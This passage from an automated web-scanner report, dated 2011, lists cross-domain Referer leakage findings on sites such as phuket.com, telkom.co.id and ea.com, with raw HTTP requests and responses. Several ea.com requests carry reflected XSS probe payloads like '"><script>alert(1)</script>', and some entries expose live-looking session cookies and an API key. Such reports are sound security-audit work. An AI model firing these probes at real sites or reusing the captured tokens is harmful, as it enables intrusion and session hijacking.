Confidence:   Certain
Host:   http://www.phuket.com
Path:   /islands/index.htm

Issue detail

The page contains a form which POSTs data to the domain search.asiawebdirect.com. The form contains the following fields:

Request

GET /islands/index.htm HTTP/1.1
Host: www.phuket.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=59015276.1308921639.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59015276.1300501793.1308921638.1308921638.1308921638.1; __utmc=59015276; __utmb=59015276.1.10.1308921638; s_sq=wotifcom-awd-global-prd%2Cwotifcom-awd-phuket-prd%3D%2526pid%253Dphuket.com%25253Ahomepage%25253Athailand%25253Aphuket%25253Aphuket.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket.com/islands/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:20:42 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Thu, 11 Feb 2010 14:13:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 239239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<div id="small-booking-box">
<form action="http://search.asiawebdirect.com/" method="POST" name="checkAvailShort" target="_blank">
<div id="small-booking-title">
...[SNIP]...
18. Cross-domain Referer leakage  previous  next
There are 64 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

18.1. http://beta.telkom.co.id/products-services/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products-services/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:27 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 466921
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Produc
...[SNIP]...
<div class="addthis_toolbox addthis_default_style">
       <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=asepyanm" class="addthis_button_compact">Share</a>
...[SNIP]...
</div>
       <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=asepyanm"></script>
...[SNIP]...
<p><a href="http://facebook.com/TelekomunikasiIndonesia" title="Become our fan on Facebook
       " target="_blank"><img src="http://beta.telkom.co.id/theme/Standard/background/facebook.gif" style="border: 0pt none ; width: 30px; height: 30px;">
...[SNIP]...
<p><a href="http://twitter.com/TelkomIndonesia" title="Follow Us on Twitter" target="_blank"><img src="http://beta.telkom.co.id/theme/Standard/background/twitter.gif" style="border: 0pt none ; width: 30px; height: 30px;">
...[SNIP]...
18.2. http://beta.telkom.co.id/rss/SimplePie/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /rss/SimplePie/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rss/SimplePie/index.php?url=http://new.telkomspeedy.com/planet/produk/rss/36 HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/op.php?icid=22
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:18:27 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 5159
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Sample SimplePie Pa
...[SNIP]...
<h2><a href="http://new.telkomspeedy.com/planet/produk/detail/36/vpn-ip" target="_blank">VPN IP</a>
...[SNIP]...
<p><a href="http://new.telkomspeedy.com/planet/produk/detail/36/vpn-ip"><img src="http://new.telkomspeedy.com/planet/gambar/product/product-36-besar.jpg" align="left" width="150" alt="" border="0" /></a>
...[SNIP]...
18.3. http://beta.telkom.co.id/rss/SimplePie/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /rss/SimplePie/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rss/SimplePie/index.php?url=http://www.telkomsel.com/rss/product HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/op.php?icid=37
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:34 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Content-Length: 4873
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Sample SimplePie Pa
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/simpati/4438-simPATI-freedom-Micro-SIM-Card.html" target="_blank">simPATI freedom Micro SIM-Card</a>
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html" target="_blank">Blackberry Enterprise Service</a>
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html" target="_blank">Paket BlackBerry Pilihan</a>
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/blackberry/551-BlackBerry-Internet-Service.html" target="_blank">BlackBerry Internet Service</a>
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/kartu-halo/612-Citibank-Telkomsel-Card.html" target="_blank">Citibank Telkomsel Card</a>
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/kartu-halo/607-HALO-Hybrid.html" target="_blank">HALO Hybrid</a>
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/kartu-halo/778-HALO-Data.html" target="_blank">HALO Data</a>
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/telkomsel-flash/667-Perdana-FLASH-Unlimited.html" target="_blank">Perdana FLASH Unlimited</a>
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/telkomsel-flash/661-Paket-Telkomsel-Flash.html" target="_blank">Paket Telkomsel Flash</a>
...[SNIP]...
<h2><a href="http://www.telkomsel.com/product/kartu-halo/764-HALO-Keluarga.html" target="_blank">HALO Keluarga</a>
...[SNIP]...
18.4. http://clicktoverify.truste.com/pvr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pvr.php?page=validate&companyName=Electronic%20Arts&sealid=105&ctv_group=EAKIDS HTTP/1.1
Host: clicktoverify.truste.com
Proxy-Connection: keep-alive
Referer: http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308533372.1.1.utmcsr=burstmedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=165058976.1665025129.1308533372.1308533372.1308533372.1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:45:46 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 12595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certi
...[SNIP]...
</script>
-->
<script type="text/javascript" src="//www.google.com/jsapi?key=ABQIAAAADt6BAnD8dtel7ntjLPvCuhQzG-EGDF6M_DW9NZrYgzPLAWeW3RSMGuC347e2oypc5xlBLRH7xra_HA">
</script>
...[SNIP]...
<div class="leftSide">
<a href='http://www.lpso.com' target="_blank"><img src='images/petshop.jpg' width=200>
...[SNIP]...
<br><a href='http://www.lpso.com' target="_blank">Return to Site</a>
...[SNIP]...
<map name="repDefMap">
                       <area alt="" shape="rect" coords="28,169,134,198" href="http://www.reputationdefender.com/lp/lp4_41-1.html" />
                   </map>
...[SNIP]...
18.5. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=simplifi HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://um.simpli.fi/g_match?id=CAESEEEVTQL6T8-H8QrpjIeZMc8&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Fri, 24 Jun 2011 17:04:28 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 266
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://um.simpli.fi/g_match?id=CAESEEEVTQL6T8-H8QrpjIeZMc8&amp;cver=1">here</A>
...[SNIP]...
18.6. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=35369&cb=-3648526499830615387 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; OAID=62614e7a17a25044ace97fcfa762d977

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:20:36 GMT; path=/
Content-Length: 1196
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
56558__zoneid=35369__OXLCA=1__cb=573378ded2__r_id=e80385b7a5e5b704171b8a6afb760d6f__r_ts=lnaqec__oadest=http%3A%2F%2Fwww.asiawebdirect.com%2Ftwittertriviathursday%2F%3Fpid%3DAWDINP582' target='_blank'><img src='http://i-cdn.servedbyopenx.com/273/2732b2df3db1100300d49e826d822014ea3e23e2/f9a/f9afbea28022d1b95872660e3310e2da.jpg' width='600' height='70' alt='' title='' border='0' /></a>
...[SNIP]...
18.7. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=35370&cb=9134173298620704648 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; OAID=62614e7a17a25044ace97fcfa762d977

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:20:36 GMT; path=/
Content-Length: 2081
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<div id='ox_c0cf3f6de15744254c56f7736adfe764' style='display: inline;'><img src='http://i-cdn.servedbyopenx.com/1x1.gif' alt='' title='' border='0' /></div>
...[SNIP]...
18.8. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=35370&cb=7887774728551453898 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; OAID=62614e7a17a25044ace97fcfa762d977

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:20:42 GMT; path=/
Content-Length: 1207
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
__bannerid=593249__zoneid=35370__OXLCA=1__cb=e1d5f8f21f__r_id=f00e32935a7128c9e800e79f55da1042__r_ts=lnaqei__oadest=http%3A%2F%2Fwww.asiawebdirect.com%2Fgssgiveaway%3Fpid%3DAWDINP1662' target='_blank'><img src='http://i-cdn.servedbyopenx.com/273/2732b2df3db1100300d49e826d822014ea3e23e2/ff8/ff866ef9c65b5e4cab808c3d83b0a7da.jpg' width='600' height='70' alt='' title='' border='0' /></a>
...[SNIP]...
18.9. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eastore.ea.com
Path:   /integration/job/request/ShoppingCartService/ea/site/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /integration/job/request/ShoppingCartService/ea/site/?%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CGet%20siteID%3D%22ea%22%20locale%3D%22en_US%22%20currencyCode%3D%22USD%22%3E%3CbaseFields%3E%3CdisplayName/%3E%3CproductType/%3E%3C/baseFields%3E%3Cattributes%3E%3Cplatform/%3E%3CeaProdImageSmall/%3E%3C/attributes%3E%3C/Get%3E%3C%21--jsonp=ShoppingCartService.jsonp1308924677596--%3E HTTP/1.1
Host: eastore.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/100bf%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E17b3cdbf2ef?ver=582_en_US
Cookie: __utma=103303007.305566496.1308924557.1308924557.1308924557.1; __utmb=103303007.4.10.1308924557; __utmc=103303007; __utmz=103303007.1308924557.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_sivo=US%3AEACOM%3ANONE; s_cc=true; s_ria=flash%20not%20detected%7Csilverlight%20not%20detected; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3A404; s_sq=%5B%5BB%5D%5D; BIGipServerp-drh-dc2pod5-pool3-active=4194435594.260.0000; fsr.s={"v":1,"rid":"1308924564819_872232","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":5,"c":"http://web-static.ea.com/us/portal/js/jquery/100bf\"><script>alert(/XSS","pv":3,"lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1308924638160}; s_ppv=0; fsr.a=1308924678607

Response

HTTP/1.1 301 Moved Permanently
Location: http://store.origin.com/integration/job/request/ShoppingCartService/ea/site/?%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CGet%20siteID%3D%22ea%22%20locale%3D%22en_US%22%20currencyCode%3D%22USD%22%3E%3CbaseFields%3E%3CdisplayName/%3E%3CproductType/%3E%3C/baseFields%3E%3Cattributes%3E%3Cplatform/%3E%3CeaProdImageSmall/%3E%3C/attributes%3E%3C/Get%3E%3C%21--jsonp=ShoppingCartService.jsonp1308924677596--%3E
Content-Type: text/html; charset=iso-8859-1
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=103388289438,0)
Content-Length: 632
Date: Fri, 24 Jun 2011 14:11:18 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://store.origin.com/integration/job/request/ShoppingCartService/ea/site/?%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CGet%20siteID%3D%22ea%22%20locale%3D%22en_US%22%20currencyCode%3D%22USD%22%3E%3CbaseFields%3E%3CdisplayName/%3E%3CproductType/%3E%3C/baseFields%3E%3Cattributes%3E%3Cplatform/%3E%3CeaProdImageSmall/%3E%3C/attributes%3E%3C/Get%3E%3C%21--jsonp=ShoppingCartService.jsonp1308924677596--%3E">here</A>
...[SNIP]...
18.10. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eastore.ea.com
Path:   /integration/job/request/ShoppingCartService/ea/site/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /integration/job/request/ShoppingCartService/ea/site/?%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CGet%20siteID%3D%22ea%22%20locale%3D%22en_US%22%20currencyCode%3D%22USD%22%3E%3CbaseFields%3E%3CdisplayName/%3E%3CproductType/%3E%3C/baseFields%3E%3Cattributes%3E%3Cplatform/%3E%3CeaProdImageSmall/%3E%3C/attributes%3E%3C/Get%3E%3C%21--jsonp=ShoppingCartService.jsonp1308924580953--%3E HTTP/1.1
Host: eastore.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/100bf%22%3E%3Cscript%3Ealert(1)%3C/script%3E17b3cdbf2ef?ver=582_en_US
Cookie: __utma=103303007.305566496.1308924557.1308924557.1308924557.1; __utmb=103303007.2.10.1308924557; __utmc=103303007; __utmz=103303007.1308924557.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_sivo=US%3AEACOM%3ANONE; s_cc=true; s_ria=flash%20not%20detected%7Csilverlight%20not%20detected; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3A404; s_sq=%5B%5BB%5D%5D; BIGipServerp-drh-dc2pod5-pool3-active=4194435594.260.0000; fsr.s={"v":1,"rid":"1308924564819_872232","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":3,"c":"http://web-static.ea.com/us/portal/js/jquery/160c2\"><script>alert(1)</script>31a872bdf89","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1308924572979}; s_ppv=0; fsr.a=1308924581973

Response

HTTP/1.1 301 Moved Permanently
Location: http://store.origin.com/integration/job/request/ShoppingCartService/ea/site/?%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CGet%20siteID%3D%22ea%22%20locale%3D%22en_US%22%20currencyCode%3D%22USD%22%3E%3CbaseFields%3E%3CdisplayName/%3E%3CproductType/%3E%3C/baseFields%3E%3Cattributes%3E%3Cplatform/%3E%3CeaProdImageSmall/%3E%3C/attributes%3E%3C/Get%3E%3C%21--jsonp=ShoppingCartService.jsonp1308924580953--%3E
Content-Type: text/html; charset=iso-8859-1
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=150632832164,0)
Content-Length: 632
Date: Fri, 24 Jun 2011 14:09:43 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://store.origin.com/integration/job/request/ShoppingCartService/ea/site/?%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CGet%20siteID%3D%22ea%22%20locale%3D%22en_US%22%20currencyCode%3D%22USD%22%3E%3CbaseFields%3E%3CdisplayName/%3E%3CproductType/%3E%3C/baseFields%3E%3Cattributes%3E%3Cplatform/%3E%3CeaProdImageSmall/%3E%3C/attributes%3E%3C/Get%3E%3C%21--jsonp=ShoppingCartService.jsonp1308924580953--%3E">here</A>
...[SNIP]...
18.11. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eastore.ea.com
Path:   /integration/job/request/ShoppingCartService/ea/site/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /integration/job/request/ShoppingCartService/ea/site/?%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3CGet%20siteID%3D%22ea%22%20locale%3D%22en_US%22%20currencyCode%3D%22USD%22%3E%3CbaseFields%3E%3CdisplayName/%3E%3CproductType/%3E%3C/baseFields%3E%3Cattributes%3E%3Cplatform/%3E%3CeaProdImageSmall/%3E%3C/attributes%3E%3C/Get%3E%3C%21--jsonp=ShoppingCartService.jsonp1308924624286--%3E HTTP/1.1
Host: eastore.ea.com
